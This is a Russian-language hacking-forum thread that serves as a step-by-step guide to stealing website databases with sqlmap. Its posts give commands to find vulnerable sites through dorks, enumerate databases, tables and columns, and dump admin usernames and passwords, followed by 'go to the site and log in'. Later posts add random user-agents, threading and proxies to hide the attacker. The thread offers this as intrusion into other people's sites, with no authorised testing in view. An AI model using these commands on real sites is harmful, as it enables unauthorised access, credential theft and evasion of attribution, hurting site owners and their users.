Загрузка...

[ Информация ] Гайд по дампу (сливу) баз через SQLmap

Тема в разделе "Статьи и мануалы хакера", создана пользователем SmsKa, 16 июн 2016.

Войдите для ответа
  1. SmsKa Вылетает BSOD после перепоя,нужен патч)))

    SmsKa
    Статус:
    Вне сети
    Регистрация:
    13 июн 2016
    Сообщения:
    1.039
    Симпатии:
    1.575
    Розыгрышей:
    0
    Движок для определения SQL-уязвимостей — пускай и самая важная, но все-таки не единственная часть функционала sqlmap. В кратце покажу работу сканера в действии.
    Скачать программы можно с этой темы
    Зарегистрируйтесь или чтоб увидеть содержимое Спойлера!
    Итак начнем. Дабы установить программу вначале необходимо скачать и установить интерпретатор python после устанавливаем сам sqlmap для удобства в ту же папку.

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Далее создаете на рабочем столе ярлык sqlmap и прописываем в поле обьект: %windir%\system32\cmd.exe
    рабочая папка: C:\Python27

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Затем запускаете ярлык.И прописываем: python sqlmap/sqlmap.py -help
    Должен появиться список команд.

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    SQLMAP GUI

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.

     
    Последнее редактирование: 16 июн 2016
  2. SmsKa Вылетает BSOD после перепоя,нужен патч)))

    SmsKa
    Статус:
    Вне сети
    Регистрация:
    13 июн 2016
    Сообщения:
    1.039
    Симпатии:
    1.575
    Розыгрышей:
    0
    sqlmap - GET метод

    Для начала нам нужна дорка, как только нашли дорку открываем sqlmap и пишем

    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2"
    sqlmap будет обнаруживать уязвимость вашей дорки и скажет вам какой тип уязвимости и тип базы данных, если цель уязвима переходим к следующему шагу.

    Находим database name
    Через эту команду находим имя базы данных
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
    Тут sqlmap найдет database name нашей цели, к примеру "web_db"


    Находим tables name
    После того как sqlmap нашел имя базы данных,ищем tables name.
    Через эту команду находим название таблиц
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --tables
    Это покажет таблици в "web_db" базе данных , к примеру "tbl_admin"


    Находим columns name
    Находим что внутри "tbl_admin" от "web_db" и это будут наши columns. Через эту команду находим columns type
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
    Это покажет нам список названий столбцов, к примеру "user" и "password"


    Дамп/dump
    Эта команда сдампит все что есть в столбцах
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C user,password --dump
    И тут мы находим "user = admin" и "password = adminpass".
    Идем на сайт и заходим


    Так же можно и так: (2 вариант)

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --technique=BEU
    sqlmap.py - это запуск самой программы
    -u - цель
    --random-agent - это скульмап берет произвольный user-agent из своей базы
    --thread 10 это количество одновременных потоков минимум 1 максимум 10
    --technique=BEU - техника эксплуатации Blind,Union,Error

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --current-user --current-db --privileges
    --current-user - пользователь БД
    --current-db - база с которой работаем

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --dbs
    проверям к каким базам данных у нас есть доступ

    покажет так:
    available databases [2]:[*] имя[*] имя
    (может быть одна или больше баз)

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --count -D имя
    Сейчас скульмап даст таблицы в базе данных "имя" и сколько записей в каждой таблице
    к примеру:
    Database: имя
    +-------------+---------+
    | Table | Entries |
    +-------------+---------+
    | ASIGNALOGO | 420 |
    | NOTAS | 411 |
    | FOTOS | 342 |
    | POBLACIONES | 28 |
    | LOGOS | 7 |
    +-------------+---------+
    теперь можно посмотреть колонки в интересующей нас таблице
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --columns -T LOGOS -D имя
    Database: имя
    Table: LOGOS
    [4 columns]
    +-------------+--------------+
    | Column | Type |
    +-------------+--------------+
    | CODIGO | int(5) |
    | DESCRIPCION | varchar(200) |
    | FICHERO | varchar(40) |
    | NOMBRE | varchar(120) |
    +-------------+--------------+
    либо можно во всех таблицах
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --columns -D имя
    Теперь дампим нужную таблицу
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --dump -T LOGOS -D имя
    дамп таблиц будет лежать в папке dump того сайта с которым мы работаем, он будет в формате .CSV открывать можно OFFICE'ом или текстовым редактором
     
    Последнее редактирование: 16 июн 2016
  3. SmsKa Вылетает BSOD после перепоя,нужен патч)))

    SmsKa
    Статус:
    Вне сети
    Регистрация:
    13 июн 2016
    Сообщения:
    1.039
    Симпатии:
    1.575
    Розыгрышей:
    0
    Немного дополню: вы можете использовать прокси при использовании данной программы для этого необходимо дописывать параметр:

    --proxy=

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.

    , где 255.255.255.255:8080 это наша прокся, а http:// тип прокси.

    В качестве типа прокси может также выступать socks4/5. В таком случае наш параметр будет выглядеть следующим образом:

    Код:
    --proxy=socks5://255.255.255.255:8080
    , где 255.255.255.255:8080 это наша прокся, а socks5// тип прокси.

    Пример использования:
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128
    И так далее во всех операциях:
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128 --dbs
    
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128 -D web_db --tables
    
    Для новичков можно использовать --wizard он облегчит вам работу.
    Значит так:
    Код:
    sqlmap.py --wizard
    
    дальше следуем по инструкции нажимаем циферки 1 или 2
     
    Последнее редактирование: 16 июн 2016
    МаРиК нравится это.

Загрузка...
Top